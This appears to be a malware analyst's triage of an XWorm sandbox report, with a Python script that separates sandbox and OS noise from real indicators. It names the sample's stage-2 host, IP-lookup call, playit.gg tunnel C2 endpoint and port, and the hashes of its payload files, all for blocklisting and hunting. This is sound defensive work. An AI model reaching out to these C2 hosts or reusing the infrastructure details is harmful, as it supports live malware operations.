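The behavioral2 Network table mixes three kinds of rows and the Files list does the same, so the indicators need triage before they go into a blocklist. The in-addr.arpa queries are the sandbox resolving the peers it saw, not sample traffic, and tse1.mm.bing.net is Windows background activity. What the sample itself produced is xworm.xyz (198.54.114.193:443, the stage-2 host), ip-api.com (the external-IP lookup; a legitimate public service that other software uses too, so it is a hunt signal when an unexpected process calls it, not a block entry) and las-protected.gl.at.ply.gg on 147.185.221.18:59571, a playit.gg tunnel endpoint used as the XWorm C2: tunnel IPs are shared by many tenants, so the hostname plus port is the stable indicator. In the Files list, $sxr-test.bat, temp.hex and Uni.exe are the payload artifacts worth hashing, while __PSScriptPolicyTest_*.ps1, StartupProfileData-NonInteractive and the CLR_v4.0\UsageLogs entries are written by PowerShell and the .NET runtime on every host that runs them, with host-specific content; their presence is evidence of execution, their hashes are not indicators.

The following is an added example, not part of the report: a triage pass over a subset of the rows above (copied from the two tables) that separates sandbox and OS noise from indicators and sorts the dual-use and tunnel cases into their own buckets. The suffix lists and the category names are my own choices, not the sandbox vendor's.

```python
import re
from collections import defaultdict

# Rows copied from the behavioral2 Network table above (subset; Country Destination Domain Proto).
NETWORK_ROWS = """
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 xworm.xyz udp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 las-protected.gl.at.ply.gg udp
US 147.185.221.18:59571 las-protected.gl.at.ply.gg tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
"""

# Entries copied from the behavioral2 Files list above (subset, SHA256 lines only).
FILE_ROWS = r"""
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fupjkccl.aq4.ps1
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
SHA256 6cced62e6af36a52c48fdf0efb1571a44d6469f4ca66ca510020e5da407ed613
C:\Users\Admin\AppData\Local\Temp\temp.hex
SHA256 917674ca36b5345dccd41f4ce772c6ffe8c3054520ebd2923fba768cbee77690
C:\Users\Admin\AppData\Local\Temp\Uni.exe
SHA256 f3fcb094f57ddd9e4c29eccc62e3ad3ce50d40230fbe0f00324ccf18acd68bc4
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Uni.exe.log
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
"""

OS_NOISE_SUFFIXES = (".bing.net", ".microsoft.com", ".windowsupdate.com", ".msftconnecttest.com")
TUNNEL_SUFFIXES = (".ply.gg",)        # playit.gg tunnel endpoints: shared IPs, block on host:port
IP_LOOKUP_SERVICES = {"ip-api.com"}   # legitimate service abused for geolocation: hunt, do not block
HOST_ARTIFACT_PATTERNS = (
    r"\\__PSScriptPolicyTest_",        # created by PowerShell itself at startup, not by the sample
    r"\\StartupProfileData-NonInteractive$",
    r"\\CLR_v4\.0\\UsageLogs\\",       # .NET usage log: proves execution, content is host-specific
)


def classify_domain(domain: str) -> str:
    d = domain.lower()
    if d.endswith((".in-addr.arpa", ".ip6.arpa")):
        return "reverse-dns-noise"      # the sandbox looking up peers it saw, not sample traffic
    if d.endswith(OS_NOISE_SUFFIXES):
        return "os-noise"
    if d in IP_LOOKUP_SERVICES:
        return "dual-use"
    if d.endswith(TUNNEL_SUFFIXES):
        return "c2-tunnel"
    return "ioc"                        # nothing else explains it: treat as an indicator


def parse_network(text: str) -> list[dict]:
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        ip, port = parts[1].rsplit(":", 1)
        rows.append({"ip": ip, "port": int(port), "proto": parts[-1],
                     "domain": parts[2] if len(parts) == 4 else ""})
    return rows


def triage_network(rows) -> dict[str, set[str]]:
    out: dict[str, set[str]] = defaultdict(set)
    for r in rows:
        cat = classify_domain(r["domain"])
        if r["port"] == 53 and r["proto"] == "udp":
            out[cat].add(r["domain"])   # resolver query: the queried name is the indicator
        else:
            out[cat].add(f'{r["domain"]} {r["ip"]}:{r["port"]}/{r["proto"]}')
    return dict(out)


def parse_files(text: str) -> list[dict]:
    """Group the report's 'path, then hash lines' layout into one dict per file."""
    entries: list[dict] = []
    for line in text.strip().splitlines():
        m = re.fullmatch(r"(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)", line)
        if m and entries:
            entries[-1][m.group(1)] = m.group(2)
        else:
            entries.append({"path": line})
    return entries


def triage_files(entries) -> dict[str, list]:
    out: dict[str, list] = {"hash-ioc": [], "host-artifact": []}
    for e in entries:
        if any(re.search(p, e["path"], re.I) for p in HOST_ARTIFACT_PATTERNS):
            out["host-artifact"].append(e["path"])
        elif "SHA256" in e:
            out["hash-ioc"].append((e["path"].rsplit("\\", 1)[-1], e["SHA256"]))
    return out


if __name__ == "__main__":
    for cat, items in sorted(triage_network(parse_network(NETWORK_ROWS)).items()):
        print(cat, sorted(items))
    print(triage_files(parse_files(FILE_ROWS)))
```

Anything the allowlists do not explain lands in "ioc" on purpose: in a detonation the default is suspicion, and an analyst removes entries from that bucket rather than adding to it.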